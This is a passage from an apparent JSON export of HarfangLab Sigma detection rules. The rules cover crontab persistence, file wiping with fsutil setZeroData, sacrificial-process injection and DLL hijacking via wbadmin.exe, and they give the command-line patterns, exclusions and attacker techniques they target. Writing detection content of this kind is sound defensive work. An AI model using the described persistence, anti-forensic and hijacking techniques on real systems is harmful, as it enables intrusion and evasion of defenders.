"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.527733Z",
"creation_date": "2026-03-23T11:45:35.294057Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.294064Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md",
"https://attack.mitre.org/techniques/T1053/003/"
],
"name": "t1053_003_crontab_edit_linux.yml",
"content": "title: Cron Jobs Edited via crontab\nid: 5e67f495-82f8-4ec4-8384-c59ee7db5876\ndescription: |\n Detects the execution of the crontab command to edit cron jobs.\n Attackers can use crontab to add a malicious cron jobs for persistence.\n It is recommended to investigate what modifications were made as well as to check the parent process for suspicious activities.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md\n - https://attack.mitre.org/techniques/T1053/003/\ndate: 2023/01/04\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.003\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.ScheduledTask\n - classification.Linux.Behavior.Persistence\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_image:\n Image|endswith: '/crontab'\n ParentImage|contains: '?'\n\n # We are interested in matching `crontab ` and `crontab -e`, but to simplify we will\n # match anything but a few unrelated flags\n filter_harmless_flags:\n CommandLine|contains:\n - ' -l'\n - ' -V'\n - ' -T'\n - ' -r'\n\n exclusion_commandline:\n CommandLine|startswith:\n - 'crontab /opt/application/'\n - 'crontab /tmp/crontab'\n - '/bin/crontab /tmp/crontab'\n - '/usr/bin/crontab /tmp/crontab'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '|/usr/bin/containerd-shim-runc-v2|'\n - '|/usr/sbin/cron|'\n - '|/usr/sbin/crond|'\n\n exclusion_plesk:\n CommandLine: '/usr/bin/crontab -u psaadm /usr/local/psa/tmp/?????????'\n ParentImage: '/usr/local/psa/admin/sbin/crontabmng'\n\n exclusion_vm:\n CommandLine: 'crontab /usr/vm/bin/run_cron'\n ParentCommandLine:\n - '/bin/bash /etc/cron.hourly/89NPMhourly'\n - '/bin/bash /bin/run-parts /etc/cron.hourly'\n - '/bin/bash -c sleep $(((RANDOM%5)));run-parts /etc/cron.hourly'\n\n exclusion_puppet:\n - ParentImage: '/opt/puppetlabs/puppet/bin/ruby'\n - GrandparentImage: '/opt/puppetlabs/puppet/bin/ruby'\n\n exclusion_flexit_modify_crontab_php:\n # php /home/flexit/flexitv2/flexit/site/www/backoffice/modules/cron/front/batch/modify_crontab.php\n GrandparentImage: '/usr/bin/php?.?'\n GrandparentCommandLine|endswith: '/flexit/flexitv2/flexit/site/www/backoffice/modules/cron/front/batch/modify_crontab.php'\n\n exclusion_dpkg:\n GrandparentImage: '/usr/bin/dpkg'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n condition: selection_image and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5e67f495-82f8-4ec4-8384-c59ee7db5876",
"rule_name": "Cron Jobs Edited via crontab",
"rule_description": "Detects the execution of the crontab command to edit cron jobs.\nAttackers can use crontab to add a malicious cron jobs for persistence.\nIt is recommended to investigate what modifications were made as well as to check the parent process for suspicious activities.\n",
"rule_creation_date": "2023-01-04",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5e8f7d64-f9ba-4111-851d-2e07c745b2d0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.069944Z",
"creation_date": "2026-03-23T11:45:34.069946Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.069950Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-file",
"https://blog.cluster25.duskrise.com/2023/05/22/back-in-black-blackbyte-nt",
"https://attack.mitre.org/techniques/T1070/004/"
],
"name": "t1070_004_fsutil_setzerodata.yml",
"content": "title: File Deleted via fsutil.exe\nid: 5e8f7d64-f9ba-4111-851d-2e07c745b2d0\ndescription: |\n Detects the execution of fsutil to delete file content.\n This technique is sometimes used by adversaries to delete their ransomware binaries or to hide their traces.\n It is recommended to investigate the files being deleted by fsutil and the execution context to determine the legitimacy of this action.\nreferences:\n - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-file\n - https://blog.cluster25.duskrise.com/2023/05/22/back-in-black-blackbyte-nt\n - https://attack.mitre.org/techniques/T1070/004/\ndate: 2024/02/20\nmodified: 2025/02/18\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.004\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Fsutil\n - classification.Windows.Behavior.Deletion\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_binary:\n - Image|endswith: '\\fsutil.exe'\n - OriginalFileName: 'fsutil.exe'\n\n selection_commandline:\n CommandLine|contains|all:\n - ' file '\n - ' setZeroData '\n - ' offset=0 '\n - ' length='\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5e8f7d64-f9ba-4111-851d-2e07c745b2d0",
"rule_name": "File Deleted via fsutil.exe",
"rule_description": "Detects the execution of fsutil to delete file content.\nThis technique is sometimes used by adversaries to delete their ransomware binaries or to hide their traces.\nIt is recommended to investigate the files being deleted by fsutil and the execution context to determine the legitimacy of this action.\n",
"rule_creation_date": "2024-02-20",
"rule_modified_date": "2025-02-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5ec7ff2f-b99d-4397-9fcc-f13cc813f7fc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623275Z",
"creation_date": "2026-03-23T11:45:34.623276Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623281Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_sacrificial_processes_no_args.yml",
"content": "title: Potential Sacrificial Process Spawned\nid: 5ec7ff2f-b99d-4397-9fcc-f13cc813f7fc\ndescription: |\n Detects suspicious system processes spawned without arguments that can be used as sacrificial ones.\n Such processes are spawned and malicious code is immediately injected into them for nefarious purposes.\n It is recommended to investigate parent-child process relationships of argumentless system processes and to isolate any suspicious instances for memory analysis.\nreferences:\n - https://attack.mitre.org/techniques/T1218/\ndate: 2020/11/23\nmodified: 2026/02/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - attack.t1055.012\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.ProcessTampering\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_rundll32:\n # Default target for Cobalt Strike's spawn task.\n Image|endswith: 'rundll32.exe'\n CommandLine|endswith:\n - 'rundll32.exe'\n # Possible quoted variants\n - 'rundll32.exe\"'\n ParentImage|contains: '?'\n\n selection_werfault:\n # Used by kraken.\n Image|endswith: 'WerFault.exe'\n CommandLine|endswith:\n - 'WerFault.exe'\n # Possible quoted variants\n - 'WerFault.exe\"'\n\n selection_dllhost:\n # Used by IcedID for shellcodes.\n Image|endswith: 'dllhost.exe'\n CommandLine|endswith:\n - 'dllhost.exe'\n # Possible quoted variants\n - 'dllhost.exe\"'\n\n selection_w32tm:\n Image|endswith: 'w32tm.exe'\n CommandLine|endswith: 'w32tm.exe'\n\n selection_smartscreen:\n Image|endswith: 'smartscreen.exe'\n CommandLine|endswith: 'smartscreen.exe'\n\n selection_credentialuibroker:\n Image|endswith: 'credentialuibroker.exe'\n CommandLine|endswith: 'credentialuibroker.exe'\n\n # NOTE: We currently exclude cmd.exe as a legitime user could type those commands without arguments.\n filter_cmd:\n ParentImage|endswith: '\\windows\\system32\\cmd.exe'\n\n exclusion_setup:\n # seen:\n # *\\appdata\\local\\microsoft\\edge\\application\\\\*\\installer\\setup.exe\n # *\\appdata\\local\\google\\chrome\\application\\\\*\\installer\\setup.exe\n # *\\appdata\\local\\BraveSoftware\\application\\\\*\\installer\\setup.exe\n ParentImage: '*\\appdata\\local\\\\*\\application\\\\*\\installer\\setup.exe'\n\n exclusion_installer:\n Image:\n - '?:\\WINDOWS\\system32\\dllhost.exe'\n - '?:\\Windows\\SysWOW64\\dllhost.exe'\n - '?:\\Windows\\System32\\rundll32.exe'\n - '?:\\Windows\\SysWOW64\\rundll32.exe'\n ParentImage:\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\is-?????.tmp\\\\*.tmp'\n - '?:\\Windows\\TempInst\\is-?????.tmp\\\\*.tmp'\n - '?:\\Windows\\Temp\\is-?????.tmp\\\\*.tmp'\n - '?:\\temp\\is-?????.tmp\\\\*.tmp'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\{????????-????-????-????-????????????}\\_is????.exe'\n - '?:\\Windows\\Temp\\{????????-????-????-????-????????????}\\_is????.exe'\n\n exclusion_f5:\n - ParentImage:\n - '?:\\programdata\\F5 Networks\\f5unistall.exe' # yes, there's a typo in unistall...\n - '*\\AppData\\Local\\F5 Networks\\f5unistall.exe'\n - GrandparentImage:\n - '?:\\ProgramData\\F5 Networks\\f5unistall.exe'\n - '*\\AppData\\Local\\F5 Networks\\f5unistall.exe'\n\n exclusion_lenovo_installer:\n ParentCommandLine|contains:\n # \"c:\\windows\\TempInst\\is-DB8TB.tmp\\n25sh04w.tmp\" /SL5=\"$C4155A,409762,57856,C:\\ProgramData\\Lenovo\\SystemUpdate\\sessionSE\\Repository\\n25sh04w\\n25sh04w.exe\" /VERYSILENT /DIR=C:\\PROGRA~3\\Lenovo\\SYSTEM~1\\SESSIO~1\\REPOSI~1\\n25sh04w\\ /EXTRACT=\"YES\"\n - ' /VERYSILENT /DIR=?:\\PROGRA~3\\Lenovo\\SYSTEM~1\\SESSIO~1\\REPOSI~1\\'\n # c:\\windows\\TempInst\\is-ECBDO.tmp\\n27lj01w.tmp /SL5=$6076C,486425,57856,C:\\ProgramData\\Lenovo\\ImController\\SystemPluginData\\LenovoSystemUpdatePlugin\\session\\Repository\\n27lj01w\\n27lj01w.exe /VERYSILENT /DIR=C:\\PROGRA~3\\Lenovo\\IMCONT~1\\SYSTEM~1\\LENOVO~2\\session\\REPOSI~1\\n27lj01w\\ /EXTRACT=YES\n - ' /VERYSILENT /DIR=?:\\PROGRA~3\\Lenovo\\IMCONT~1\\SYSTEM~1\\LENOVO~'\n # \"c:\\windows\\TempInst\\is-MB6TA.tmp\\HSW_vProChecker.tmp\" /SL5=\"$390652,290538,54272,C:\\ProgramData\\Lenovo\\SystemUpdate\\sessionSE\\Repository\\jdrg04ww\\HSW_vProChecker.exe\" /VERYSILENT /PARAM=\"-feat !!M3 Autotest!! -value !!Enabled!!\"\n - ' /VERYSILENT /PARAM=\"-feat !!M3 Autotest!! -value !!Enabled!!\"'\n # c:\\windows\\TempInst\\is-TKR5P.tmp\\HSW_vProChecker.tmp /SL5=$2C095A,290538,54272,C:\\ProgramData\\Lenovo\\SystemUpdate\\sessionSE\\Repository\\girg39ww_vpro\\HSW_vProChecker.exe /VERYSILENT /PARAM=-feat !!M3 Autotest!! -value !!Enabled!!\n - ' /VERYSILENT /PARAM=-feat !!M3 Autotest!! -value !!Enabled!!'\n # c:\\windows\\TempInst\\is-V32OO.tmp\\girg38ww.tmp /SL5=$80676,5897380,54272,C:\\ProgramData\\Lenovo\\SystemUpdate\\sessionSE\\Repository\\girg38ww_nonvpro\\girg38ww.exe /VERYSILENT /DIR=C:\\ProgramData\\Lenovo\\SystemUpdate\\sessionSE\\Repository\\girg38ww_nonvpro\\ /EXTRACT=YES\n - ' /VERYSILENT /DIR=?:\\ProgramData\\Lenovo\\SystemUpdate\\sessionSE\\Repository\\'\n # C:\\Windows\\TEMP\\is-82VLT.tmp\\n1qvub3w.tmp /SL5=$701DC,26771463,54272,C:\\ProgramData\\Lenovo\\SystemUpdate\\sessionSE\\Repository\\n1qvub3w_win7\\n1qvub3w.exe /VERYSILENT /DIR=C:\\ProgramData\\Lenovo\\SYSTEM~1\\SESSIO~1\\REPOSI~1\\N1QVUB~1\\ /EXTRACT=YES\n - ' /VERYSILENT /DIR=?:\\ProgramData\\Lenovo\\SYSTEM~1\\SESSIO~1\\REPOSI~1\\'\n # C:\\ProgramData\\Lenovo\\Vantage\\AddinData\\LenovoSystemUpdateAddin\\session\\Repository\\grwt06ww\\grwt06ww.exe /VERYSILENT /DIR=C:\\PROGRA~3\\Lenovo\\Vantage\\ADDIND~1\\LENOVO~1\\session\\REPOSI~1\\grwt06ww\\ /EXTRACT=YES\n - '/VERYSILENT /DIR=?:\\PROGRA~3\\Lenovo\\Vantage\\ADDIND~1\\LENOVO~1\\session\\REPOSI~1\\'\n # C:\\ProgramData\\Lenovo\\SystemUpdate\\sessionSE\\Repository\\n10cp05w_10\\n10cp05w.exe /VERYSILENT /SP- /DIR=C:\\PROGRA~3\\Lenovo\\SYSTEM~1\\SESSIO~1\\REPOSI~1\\N10CP0~1\\ /EXTRACT=YES\n - '/VERYSILENT /SP- /DIR=?:\\PROGRA~3\\Lenovo\\SYSTEM~1\\SESSIO~1\\REPOSI~1\\'\n # C:\\Users\\xxxxx\\AppData\\Local\\Temp\\is-U2SKB.tmp\\k2vdo07us14.tmp /SL5=$B004C,175816560,56832,C:\\Users\\xxxxx\\Downloads\\k2vdo07us14.exe /SPAWNWND=$70658 /NOTIFYWND=$8054E\n - '/SL5=* /SPAWNWND=* /NOTIFYWND='\n # C:\\Users\\xxx\\AppData\\Local\\Temp\\is-621FA.tmp\\nz3gr01w.tmp /SL5=$813AC,23294916,56832,C:\\ProgramData\\Lenovo\\UpdateRetriever\\Session\\LenovoDrivers\\temp\\868\\nz3gr01w.exe /VERYSILENT /EXTRACT=YES /DIR=C:\\LenovoDriverPacks\\ThinkPad X1 Yoga 3rd Gen Type 20LD 20LE 20LF 20LG win10\\Security\\nz3gr01w\n - '/VERYSILENT /EXTRACT=YES /DIR=?:\\LenovoDriverPacks'\n # C:\\WINDOWS\\TEMP\\is-J5LLB.tmp\\n1wvu28w.tmp /SL5=$D00A6,14025556,54272,C:\\WINDOWS\\ccmcache\\h\\n1wvu28w.exe /PARAM=/S /SP- /VERYSILENT /NORESTART /SUPPRESSMSGBOXES\n - '/PARAM=/S /SP- /VERYSILENT /NORESTART /SUPPRESSMSGBOXES'\n\n exclusion_msedge_updater:\n - ParentImage|endswith: '\\setup.exe'\n ParentCommandLine|contains|all:\n # seen \"d:\\profils\\XXXX\\AppData\\Local\\Temp\\EDGEMITMP_22230.tmp\\setup.exe\" --install-archive=\"d:\\profils\\XXXX\\AppData\\Local\\Temp\\EDGEMITMP_22230.tmp\\MSEDGE_PATCH.PACKED.7Z\" --previous-version=\"91.0.864.37\" --msedge --verbose-logging --do-not-launch-msedge\n - '.PACKED.7Z' # either MSEDGE_PATCH.PACKED.7Z or MSEDGE.PACKED.7Z\n - '--msedge'\n - '--do-not-launch-msedge'\n - ParentImage|endswith: '\\setup.exe'\n ParentCommandLine|contains|all:\n # seen C:\\Users\\xxx\\AppData\\Local\\Microsoft\\EdgeUpdate\\Install\\{1B0E22A8-A5FA-401B-BC1C-5376E496005C}\\EDGEMITMP_BCFB1.tmp\\setup.exe --install-archive=C:\\Users\\xxx\\AppData\\Local\\Microsoft\\EdgeUpdate\\Install\\{1B0E22A8-A5FA-401B-BC1C-5376E496005C}\\MicrosoftEdge_X64_103.0.1264.37_102.0.1245.44.exe --previous-version=102.0.1245.44 --msedge --verbose-logging --do-not-launch-msedge --channel=stable\n - 'AppData\\Local\\Microsoft\\EdgeUpdate' # either MSEDGE_PATCH.PACKED.7Z or MSEDGE.PACKED.7Z\n - '--msedge'\n - '--do-not-launch-msedge'\n - Image: '?:\\Windows\\System32\\rundll32.exe'\n ParentImage:\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\\\*\\Installer\\setup.exe'\n - '?:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\{????????-????-????-????-????????????}\\EDGEMITMP_*.tmp\\setup.exe'\n GrandparentImage:\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\\\*\\Installer\\setup.exe'\n - '?:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\{????????-????-????-????-????????????}\\MicrosoftEdge_X64_*.exe'\n\n exclusion_lenovo_systemupdate:\n User: '*lenovo_tmp_*'\n # \"c:\\windows\\TempInst\\is-2FIDC.tmp\\HSW_vProChecker.tmp\" /SL5=\"$A0742,290538,54272,C:\\ProgramData\\Lenovo\\SystemUpdate\\sessionSE\\Repository\\jdrg04ww\\HSW_vProChecker.exe\" /VERYSILENT /PARAM=\"-feat !!M3 Autotest!! -value !!Enabled!!\"\n ParentCommandLine: '*/VERYSILENT*'\n\n exclusion_nvidia_installer:\n # c:\\windows\\syswow64\\rundll32.exe c:\\users\\XXX\\AppData\\Local\\Temp\\NVI2_29.DLL,DeferredDelete {XXX-XXX-XXX (GUID)} 11111 c:\\windows\\syswow64\\rundll32.exe\n CommandLine: '*\\windows\\syswow64\\rundll32.exe*DeferredDelete *\\windows\\syswow64\\rundll32.exe*'\n\n exclusion_pdf_xchange:\n # C:\\Users\\XXXX\\AppData\\Local\\Temp\\is-E1ON0.tmp\\PDFX4SA_sm.tmp /SL5=$1A083A,5674009,54272,\\\\...\\PostInstallation\\PDFTools\\PDFX4SA_sm.exe /SILENT /NORESTART /DIR=C:\\Program Files\\Tracker Software\\PDF-XChange 4\" /LANG=fr /PName=PDF-XChange pour XXXX\n ParentCommandLine|contains: 'Program Files\\Tracker Software\\PDF-XChange'\n\n exclusion_chromecleaner:\n # C:\\Users\\xxxx\\AppData\\Local\\Temp\\ChromeCleaner_0_2084_1964492881\\88407957-5e5a-4da3-8ccc-ed403471c9ce.exe --chrome-version=102.0.5005.115 --chrome-channel=4 --chrome-exe-path=C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe --chrome-system-install --execution-mode=1 --engine=2 --chrome-prompt=3 --reset-shortcuts --chrome-write-handle=3960 --chrome-read-handle=2024\n ParentCommandLine|contains|all:\n - '--chrome-exe-path'\n - '--reset-shortcuts'\n - '--chrome-system-install'\n - '--chrome-channel'\n\n exclusion_citrix:\n # C:\\Windows\\SysWOW64\\rundll32.exe\n ParentImage|contains: '\\AppData\\Local\\Citrix\\ICA Client\\CitrixBrowser\\\\*\\Installer\\setup.exe'\n GrandparentImage|endswith:\n - '\\AppData\\Local\\Temp\\Ctx*\\CitrixReceiver\\Ctx-*\\Extract\\TrolleyExpress.exe'\n - '\\AppData\\Local\\Citrix\\Citrix Workspace *\\CWAInstaller.exe'\n\n exclusion_exchange:\n # C:\\Windows\\system32\\w32tm.exe\n ParentCommandLine: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -noexit -command . ?*\\Microsoft Exchange\\\\*\\bin\\RemoteExchange.ps1?; Connect-ExchangeServer -auto*'\n\n exclusion_dell:\n GrandparentImage: '?:\\ProgramData\\Dell\\drivers\\\\????????-????-????-????-????????????\\DellOptimizer.exe'\n\n exclusion_firewall:\n CommandLine|startswith: '?:\\Windows\\System32\\rundll32.exe ?:\\Windows\\System32\\FirewallControlPanel.dll,ShowNotificationDialog '\n ParentCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k LocalServiceNoNetworkFirewall -p'\n\n exclusion_credentialuibroker:\n Image:\n - '?:\\Windows\\System32\\CredentialUIBroker.exe'\n - '?:\\Windows\\SysWOW64\\CredentialUIBroker.exe'\n ParentImage:\n - '?:\\Windows\\explorer.exe'\n - '?:\\Program Files\\UiPath\\Studio*'\n\n exclusion_landesk:\n GrandparentCommandLine|startswith: '?:\\Program Files (x86)\\LANDesk\\LDClient\\sdmcache'\n\n exclusion_lenovo:\n GrandparentCommandLine|endswith: 'setup.exe /verysilent'\n Signed: 'true'\n Company: 'Lenovo Group Limited'\n\n exclusion_dataview:\n GrandparentImage: '?:\\Program Files (x86)\\DataView\\PDFXChange\\PDFX3SA_sm.exe'\n\n exclusion_powershell_command:\n Image: '?:\\Windows\\System32\\w32tm.exe'\n ParentImage: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n GrandparentImage:\n - '?:\\Windows\\explorer.exe'\n - '?:\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_*\\WindowsTerminal.exe'\n\n exclusion_sihost:\n ParentImage: '?:\\Windows\\System32\\sihost.exe'\n GrandparentImage: '?:\\Windows\\System32\\svchost.exe'\n\n condition: 1 of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5ec7ff2f-b99d-4397-9fcc-f13cc813f7fc",
"rule_name": "Potential Sacrificial Process Spawned",
"rule_description": "Detects suspicious system processes spawned without arguments that can be used as sacrificial ones.\nSuch processes are spawned and malicious code is immediately injected into them for nefarious purposes.\nIt is recommended to investigate parent-child process relationships of argumentless system processes and to isolate any suspicious instances for memory analysis.\n",
"rule_creation_date": "2020-11-23",
"rule_modified_date": "2026-02-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055.012",
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5ed28bb8-b225-4f34-936c-2f4d80bc9cd0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.594277Z",
"creation_date": "2026-03-23T11:45:34.594280Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.594288Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wbadmin.yml",
"content": "title: DLL Hijacking via wbadmin.exe\nid: 5ed28bb8-b225-4f34-936c-2f4d80bc9cd0\ndescription: |\n Detects potential Windows DLL Hijacking via wbadmin.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wbadmin.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\credui.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5ed28bb8-b225-4f34-936c-2f4d80bc9cd0",
"rule_name": "DLL Hijacking via wbadmin.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wbadmin.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
